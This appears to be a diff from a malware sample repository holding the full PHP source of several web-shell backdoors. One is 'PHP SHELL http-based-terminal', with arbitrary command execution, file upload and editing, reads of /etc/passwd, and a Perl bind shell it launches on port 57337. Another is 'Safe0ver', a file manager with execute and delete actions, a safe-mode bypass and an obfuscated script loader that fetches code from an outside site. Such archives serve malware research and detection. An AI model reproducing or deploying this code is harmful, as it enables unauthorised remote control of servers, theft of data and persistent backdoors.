print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Copyright is reserved to Ekin0x <br>[ By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]";
print"</font></td></tr></table>";
include ($a.$b.$c);
?>

289
PHP/Backdoor.PHP.Agent.bq Normal file
View File

@ -0,0 +1,289 @@
<?
error_reporting(0);
################################
# PHP SHELL http-based-terminal #
# by PHP SHELL #
################################
?>
<?$dir=realpath("./")."/";
$dir=str_replace("\\","/",$dir);
?>
<?
$dirfile="$file_to_download";
if (file_exists("$dirfile"))
{
header("location: $dirfile");
}
?>
<title>PHP SHELL http-based-terminal - <? echo $dir?></title>
<!-- PHP SHELL http-based-terminal - DANGEROUS GHOST` -->
<style>
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
input {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: #335F92;
border: solid 2px;
border-color: black
}
textarea {
color: black;
background-color: #335F92;
border: solid 2px;
border-color: black
}
select {
background-color: #335F92;
font: 10px verdana;
}
A:link {color:white;
text-decoration: none
}
A:visited { color:white;
text-decoration: none
}
A:active {color:white;
text-decoration: none
}
A:hover {color:red;
text-decoration: none
}
</style>
<center>
<table bgcolor=black cellspacing=1 width=100%><tr><td>
<table bgcolor=#363d4e width=100%>
<tr><td><center><b>
<font size=-2 face=verdana color=red>n57http-based Terminal<br>
<table width=100% heigth=0 cellpadding=0 cellspacing=0>
<tr><td>
</font>
<font size=-2 face=verdana color=white>
<form method=post>
<font color=white>
<b>::Exec command::</b><br>
<input name=exec size=50% value='<?echo"$exec";?>'><br>
<input name=dirname size=50% value='<?
if ($dirname == "") {print "/tmp/";}
else {
echo"$dirname";}?>'>
<?if($dirname !== "") { chdir($dirname);}?><br>
<input type=submit value="..Exec.. ">
</form>
<form enctype="multipart/form-data" method=post>
<b>::File upload::</b><br>
<input name=userfile type=file size=50%><br>
<input name=dirname size=50% value='<?
if ($dirname == "") {print "/tmp/";}
else {
echo"$dirname";}?>'><Br>
<input name=submit type=submit value=" Upload">
</form>
<form method=post>
<b>::Encode to md5,base64,Des::</b><br>
<input name='chack' value='<?echo"$chack"?>' size=31><br>
<?
if ($chack == "");
else {
echo "<font size=-2 face=verdana color=white><b>- $chack -</b></font><br>";
echo "<font size=-2 face=verdana color=white><b><u>MD5:</u></b> "; echo md5("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>Encode base64:</u></b> "; echo base64_encode("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>Decode base64:</u></b> "; echo base64_decode("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>DES:</u></b> "; echo crypt("$chack"); echo "<br></font>";
}
?>
</form>
</td><td valign=top><div align=right>
<font size=-2 face=verdana color=white>
<form method=post>
<br><b>::Fast CMD::<Br></b><select size="1" name="runcmd">
<option value='1'>Find *-rw-* files</option>
<option value='2'>Find all config files</option>
<option value='3'>ps aux</option>
<option value='4'>cat /etc/passwd</option>
<option value='5'>cat /etc/httpd/conf/httpd.conf</option>
<option value='6'>cat &lt;dir&gt;/conf/httpd.conf</option>
<option value='7'>ls -la /var/lib/mysql/</option>
<option value='8'>netstat -a</option>
<option value='9'>perl --help</option>
<option value='10'>gcc --help</option>
<option value='11'>tar --help</option>
<option selected>o...Select command...o</option>
</select><br>
<input type=submit value='...Exec...'></form>
<form method=post>
<b>::Edit/Create file::<br></b> <input name=editfile value='<?
if ($dirname == "") {print "/tmp/file.txt";}
else {
echo"$dirname$editfile";}?>'>
</form>
<form method=post>
<b>::Download file::<Br></b>
<input name='file_to_download' value='<?
if ($dirname == "") {print "/tmp/file.txt";}
else {
echo "$dirname","file.txt";}?>'><br>
<input type=submit value=Download>
</form>
</div>
</td></tr></table>
<div align=left><font size=-2 face=verdana color=white>
<table border=1 width=100%><tr><td>
<font size=-2 face=verdana color=white>
<b>Kernel: </b>
<? passthru("uname -a");?>
<br>
<b>ID: </b>
<? passthru("id");?><br>
<b>Dir:</b> <? echo getcwd();?></div></td><td valign=top width=190><div align=right>
<font size=-2 face=verdana color=white>
<form method=post>
If SafeMode is On, then use this:
<input name=phpdir size=34 value='<?
if ($phpdir == "") {print "/Directory";}
else {
echo"$phpdir";}?>'>
</form>
<? ######## perl shell #########
$perlshell = "
#!/usr/bin/perl
use Socket;
#rintf \"BS9n\";
#lush();
+port= 57337;
+proto= getprotobyname(\'tcp\');
+cmd= \"lpd\";
+system= \'echo \"(`whoami`@`uname -n`:`pwd`)\"; /bin/sh\';
+0 = +cmd;
socket(SERVER, PF_INET, SOCK_STREAM, +proto) or die \"socket:$!\";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack(\"l\", 1)) or die \"setsockopt: $!\";
bind(SERVER, sockaddr_in(+port, INADDR_ANY)) or die \"bind: +!\";
listen(SERVER, SOMAXCONN)or die \"listen: +!\";
for(; +paddr = accept(CLIENT, SERVER); close CLIENT)
{
open(STDIN, \">&CLIENT\");
open(STDOUT, \">&CLIENT\");
open(STDERR, \">&CLIENT\");
system(+system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
";
############# C++ shell #########
$cshell = "
";
?>
</div></td></tr></table>
</td></tr>
<font size=-2 face=verdana color=white><B>Backdoor directory: &nbsp;<?echo $dir?></b>
<tr><td>
<? if($editfile == ""); else {echo '
<form method=post>
<textarea name=editpost cols=70 rows=20>';
$filename = "$editfile";
$fd = fopen ($filename, "r");
$out = fread ($fd, filesize ($filename));
fclose ($fd);
echo "$out";
echo '</textarea><br>
<input name=editfile size=100% value=';echo $editfile;echo'>
<input type=submit value=-Edit-><br>
';
if ($editpost == ""); else {
$editpost = str_replace("\\","",$editpost);
$fp = fopen($editfile, w);
fwrite($fp,"$editpost");
print "<center><font size=-2 face=verdana color=green><b>File <u>$editfile</u> edited/created success!</b></font><br></center>";
print "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana color=white><center>:: PHPshell.org http-based-terminal ::</a>";
print "</td></tr></table></td></tr></table>";exit;
}
;}
?>
<textarea name=terminal cols=121 rows=20>
<?
if($fileperl == "nst.pl") {
$perlshell = str_replace("+","$",$perlshell);
$perlshell = str_replace("\\","",$perlshell);
$perlshell = str_replace("9","\\",$perlshell);
$nst = fopen("/tmp/nst.pl", w);
fwrite($nst, "$perlshell");
exec("perl /tmp/nst.pl");
echo "If perl exist, and no firewall on serv (etc), then you will got shell on port 57337";
}
?>
<?
if (($phpdir == "") or ($phpdir == "/Directory"));
else {
$dh = opendir($phpdir) or die("couldn't open directory");
while (!(($file = readdir($dh)) === false)) {
if (is_dir("$phpdir/$file")) {
print "\n[D] : ";
}
print "$file\n";
}
closedir($dh);}
?>
<?
### 4tobi dobavit kamandu, to dabavte jejo tut i smatrite vi6e
### tam gde <option>
if($runcmd == "1") {passthru("find / -type f -perm -04000 -ls");}
if($runcmd == "2") {passthru("locate config");}
if($runcmd == "3") {passthru("ps aux");}
if($runcmd == "4") {passthru("cat /etc/passwd");}
if($runcmd == "5") {passthru("cat /etc/httpd/conf/httpd.conf");}
if($runcmd == "6") {passthru("cat /usr/local/apache/conf/httpd.conf");}
if($runcmd == "7") {passthru("ls -la /var/lib/mysql");}
if($runcmd == "8") {passthru("netstat -a");}
if($runcmd == "9") {passthru("perl --help");}
if($runcmd == "10") {passthru("gcc --help");}
if($runcmd == "11") {passthru("tar --help");}
#if($runcmd == "12") {passthru("");}
#if($runcmd == "13") {passthru("");}
# etc..
?>
<?
if (isset($submit)){
copy($userfile,$dirname.$userfile_name);
if (!is_uploaded_file ($userfile)){
echo "$userfile_name can't upload";
}
}
if (is_uploaded_file ($userfile)){
echo "Uploaded to: $dirname$userfile_name\n\n";
}
?>
<?
if (($exec == "") or ($exec == "ls -la")) {print passthru("ls -la");}
else
passthru($exec);
?>
</textarea>
<table width=100% heigth=0 cellpadding=0 cellspacing=0><tr><td valign=top><form method=post>
<font size=-2 face=verdana color=white>
<b>Run backdoor on port 57337
<input type=hidden name=fileperl value='nst.pl'>
<input type=submit value='Open'><br>[Perl] </b>
</form></td><td valign=top><div align=right>
<!-- <form method=post> -->
<b><input type=submit value='Open'>
<font size=-2 face=verdana color=white>
<!-- <input type=hidden name=filec value='nst.c'> -->
Run backdoor on port 57338<br></b>Soon <b>[C++]<sub></sub></b>
<!-- </form> --> </div></td></tr></table>
<? echo "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana><center>PHPshell.org http-based-terminal v1.0 </a>";?>
</td></tr></table></td></tr></table>';
?>

939
PHP/Backdoor.PHP.Agent.br Normal file
View File

@ -0,0 +1,939 @@
<?php
/*
*****************************************************************************************
* Safe0ver Shell //Safe Mod Bypass By Evilc0der *
*****************************************************************************************
* Cyber-Warrior.Org is a Platform Which You can Publish Your Shell Script *
*****************************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/
/*Setting some envirionment variables...*/
/* I added this to ensure the script will run correctly...
Please enter the Script's filename in this variable. */
$SFileName=$PHP_SELF;
/* uncomment the two following variables if you want to use http
authentication. This will password protect your PHPShell */
//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "Safe0ver";
$scriptident = "$scriptTitle By Evilc0der.com";
$urlAdd = "";
$formAdd = "";
function walkArray($array){
while (list($key, $data) = each($array))
if (is_array($data)) { walkArray($data); }
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") {
$urlAdd= substr($urlAdd, 0, $pos);
}
$urlAdd .= "&s=r&";
if (empty($Pmax))
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
$Pidx = 0;
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
$scriptdate = "7 Subat 2007";
$scriptver = "Bet@ Versiyon";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
"Edit" => "edit.gif",
"Download" => "download.gif",
"Upload" => "upload.gif",
"Delete" => "delete.gif",
"View" => "view.gif",
"Rename" => "rename.gif",
"Move" => "move.gif",
"Copy" => "copy.gif",
"Execute" => "exec.gif"
);
while (list($id, $im)=each($img))
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
else
$img[$id] = "[$id]";
/* HTTP AUTHENTICATION */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
setcookie("noauth","");
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
Header( "HTTP/1.0 401 Unauthorized");
echo "Your username or password is incorrect";
exit ;
}
function buildUrl($display, $url) {
global $urlAdd;
$url = $SFileName . "?$urlAdd$url";
return "<a href=\"$url\">$display</a>";
}
function sp($mp) {
for ( $i = 0; $i < $mp; $i++ )
$ret .= "&nbsp;";
return $ret;
}
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
function Mydeldir($Fdir) {
if (is_dir($Fdir)) {
$Fh=@opendir($Fdir);
while ($Fbuf = readdir($Fh))
if (($Fbuf != ".") && ($Fbuf != ".."))
Mydeldir("$Fdir/$Fbuf");
@closedir($Fh);
return rmdir($Fdir);
} else {
return unlink($Fdir);
}
}
function arrval ($array) {
list($key, $data) = $array;
return $data;
}
function formatsize($insize) {
$size = $insize;
$add = "B";
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "KB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "MB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "GB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "TB";
}
return "$size $add";
}
if ($cmd != "downl") {
?>
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
<HEAD>
<STYLE>
<!--
A{ text-decoration:none; color:navy; font-size: 12px }
body {
font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: white;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: white;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: white;
scrollbar-arrow-color: black;
background-color: #CCCCCC;
}
Table { font-size: 12px; }
TR{ font-size: 12px; }
TD{
font-size: 12px;
font-family: arial, helvetical;
BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
COLOR: black;
background: #CCCCCC;
}
.border{ BORDER-LEFT: black 1px solid;
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-BOTTOM: black 1px solid;
}
.none { BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
}
.inputtext {
background-color: #EFEFEF;
font-family: arial, helvetica;
border: 1px solid #000000;
height: 20;
}
.lighttd { background: #F8F8F8;
}
.darktd { background: #CCCCCC;
}
input { font-family: arial, helvetica;
}
.inputbutton {
background-color: #CCCCCC;
border: 1px solid #000000;
border-width: 1px;
height: 20;
}
.inputtextarea {
background-color: #CCCCCC;
border: 1px solid #000000;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: #EFEFEF;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: #EFEFEF;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: #EFEFEF;
scrollbar-arrow-color: black;
}
.top { BORDER-TOP: black 1px solid; }
.textin { BORDER-LEFT: silver 1px solid;
BORDER-RIGHT: silver 1px solid;
BORDER-TOP: silver 1px solid;
BORDER-BOTTOM: silver 1px solid;
width: 99%; font-size: 12px; font-weight: bold; color: Black;
}
.notop { BORDER-TOP: black 0px solid; }
.bottom { BORDER-BOTTOM: black 1px solid; }
.nobottom { BORDER-BOTTOM: black 0px solid; }
.left { BORDER-LEFT: black 1px solid; }
.noleft { BORDER-LEFT: black 0px solid; }
.right { BORDER-RIGHT: black 1px solid; }
.noright { BORDER-RIGHT: black 0px solid; }
.silver{ BACKGROUND: #CCCCCC; }
body,td,th {
color: #660000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #00FF00;
text-decoration: none;
}
a:active {
color: #666666;
text-decoration: none;
}
a:visited {
text-decoration: none;
}
.style5 {
color: #660000;
font-weight: bold;
}
-->
</STYLE>
<TITLE><?php echo $SFileName ?></TITLE>
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%70%68%70%2D%73%68%65%6C%6C%2E%6F%72%67%2F%63%77%68%69%64%64%65%6E%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E'));
//-->
</Script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<body topmargin="0" leftmargin="0">
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border"><center>
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
</center></td>
</tr>
</table>
<table width=100% height="100%" NOWRAP border="0">
<tr NOWRAP>
<td width="100%" NOWRAP><br>
<?php
}
if ( $cmd=="dir" ) {
$h=@opendir($dir);
if ($h == false) {
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
Script Gecisi Tamamlayamadi!
<br><br>".sp(3)."\n
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
<br><br></font>\n\n\n\n";
}
if (function_exists('realpath')) {
$partdir = realpath($dir);
}
else {
$partdir = $dir;
}
if (strlen($partdir) >= 100) {
$partdir = substr($partdir, -100);
$pos = strpos($partdir, "/");
if (strval($pos) != "") {
$partdir = "<-- ...".substr($partdir, $pos);
}
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
}
?>
<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="border nobottom noright">
&nbsp;Listeliyor:&nbsp;
</td>
<td width="100%" class="border nobottom noleft">
<table width="100%" border="0" cellpadding="1" cellspacing="0">
<tr>
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
<td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- </form> -->
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
<tr>
<td width="100%" NOWRAP class="silver border">
&nbsp;Dosya Adi&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Yapilabilecekler&nbsp;&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Boyut&nbsp;
</td>
<td width=1 NOWRAP class="silver border noleft">
&nbsp;Yetkiler&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Son Düzenleme&nbsp;
</td>
<tr>
<?php
/* <!-- This whole heap of junk is the sorting section... */
$dirn = array();
$filen = array();
$filesizes = 0;
while ($buf = readdir($h)) {
if (is_dir("$dir/$buf"))
$dirn[] = $buf;
else
$filen[] = $buf;
}
$dirno = count($dirn) + 1;
$fileno = count($filen) + 1;
function mycmp($a, $b){
if ($a == $b) return 0;
return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
if (function_exists("usort")) {
usort($dirn, "mycmp");
usort($filen, "mycmp");
}
else {
sort ($dirn);
sort ($filen);
}
reset ($dirn);
reset ($filen);
if (function_exists('array_merge')) {
$filelist = array_merge ($dirn, $filen);
}
else {
$filelist = $dirn + $filen;
}
if ( count($filelist)-1 > $Pmax ) {
$from = $Pidx * $Pmax;
$to = ($Pidx + 1) * $Pmax-1;
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
$to = count($filelist) - 1;
if ($to > count($filelist)-1)
$to = count($filelist)-1;
$Dcontents = array();
For ($Fi = $from; $Fi <= $to; $Fi++) {
$Dcontents[] = $filelist[$Fi];
}
}
else {
$Dcontents = $filelist;
}
$tdcolors = array("lighttd", "darktd");
while (list ($key, $file) = each ($Dcontents)) {
if (!$tdcolor=arrval(each($tdcolors))) {
reset($tdcolors);
$tdcolor = arrval(each($tdcolors)); }
if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
/* <!-- Dirname --> */
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
/* <!-- Rename --> */
if ( ($file != ".") && ($file != "..") )
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Delete --> */
if ( ($file != ".") && ($file != "..") )
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- End of Actions --> */
echo "&nbsp;&nbsp;</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
echo "<strong>D</strong>";
if ( @is_readable("$dir/$file") ) {
echo "<strong>R</strong>";
}
if (function_exists('is_writeable')) {
if ( @is_writeable("$dir/$file") ) {
echo "<strong>W</stong>";
}
}
else {
echo "<strong>(W)</stong>";
}
if ( @is_executable("$dir/$file") ) {
echo "<Strong>X<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
else { /* <!-- Then it must be a File... --> */
/* <!-- Filename --> */
if ( @is_readable("$dir/$file") )
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
else
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
/* <!-- Rename --> */
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Edit --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
/* <!-- Copy --> */
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
/* <!-- Move --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
/* <!-- Delete --> */
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- Download --> */
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
/* <!-- Execute --> */
if ( @is_executable("$dir/$file") )
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
/* <!-- End of Actions --> */
echo sp(2)."</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
$size = @filesize("$dir/$file");
If ($size != false) {
$filesizes += $size;
echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
}
else
echo "&nbsp;&nbsp;<strong>0 B<strong>";
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
if ( @is_readable("$dir/$file") )
echo "<strong>R</strong>";
if ( @is_writeable("$dir/$file") )
echo "<strong>W</stong>";
if ( @is_executable("$dir/$file") )
echo "<Strong>X<strong>";
if (function_exists('is_uploaded_file')){
if ( @is_uploaded_file("$dir/$file") )
echo "<Strong>U<strong>";
}
else {
echo "<Strong>(U)<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
}
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
function printpagelink($a, $b, $link = ""){
if ($link != "")
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
else
echo "<b>| $a - $b |</b>";
}
if ( count($filelist)-1 > $Pmax ) {
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
$Fi = 0;
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = ($Fi + 1) * $Pmax - 1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "&nbsp;&nbsp;&nbsp;";
$Fi++;
}
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = count($filelist)-1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "</center></td></tr></table></td></tr>";
}
echo "</table>\n<br><table NOWRAP>";
if ($isGoodver) {
echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
}
else {
echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
}
/* <!-- Other Actions --> */
echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
echo "</table></td>";
echo "</table>";
echo "<br>";
@closedir($h);
}
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
echo system("$file");
}
elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (Mydeldir($file)==false) {
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
